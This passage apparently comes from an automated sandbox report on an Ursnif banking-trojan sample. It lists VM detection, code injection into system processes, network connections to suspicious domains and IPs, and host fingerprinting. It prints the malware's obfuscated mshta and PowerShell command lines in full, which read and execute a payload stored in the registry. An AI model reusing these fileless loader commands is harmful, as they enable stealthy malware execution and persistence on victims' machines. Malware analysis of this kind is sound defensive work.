00000002.00000003.338033120.000000000336B000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000004.00000003.811718040.0000000000F5A000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW@
Source: mshta.exe, 00000017.00000002.390538379.000002B5EF59B000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

Anti Debugging:

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: berukoneru.website
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 79.110.52.144 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: windows.update3.com
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 18.219.227.107 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 3.12.124.139 187	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: unknown protection: execute and read and write

Writes to foreign memory regions

Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\BackgroundTransferHost.exe base: 7FF65B0E12E0	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\BackgroundTransferHost.exe base: 7FF65B0E12E0	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3472
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3472
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3472

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: unknown EIP: 9B851580

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: unknown unknown
Source: C:\Windows\System32\control.exe	Process created: unknown unknown
Source: C:\Windows\System32\control.exe	Process created: unknown unknown

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_00F1A303 cpuid

4_2_00F1A303

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_00F13A79 HeapFree,GetSystemTimeAsFileTime,HeapFree,

4_2_00F13A79

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_00F14638 GetVersion,lstrcat,lstrcat,lstrcat,GetLastError,

4_2_00F14638

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_00F1A303 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

4_2_00F1A303

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
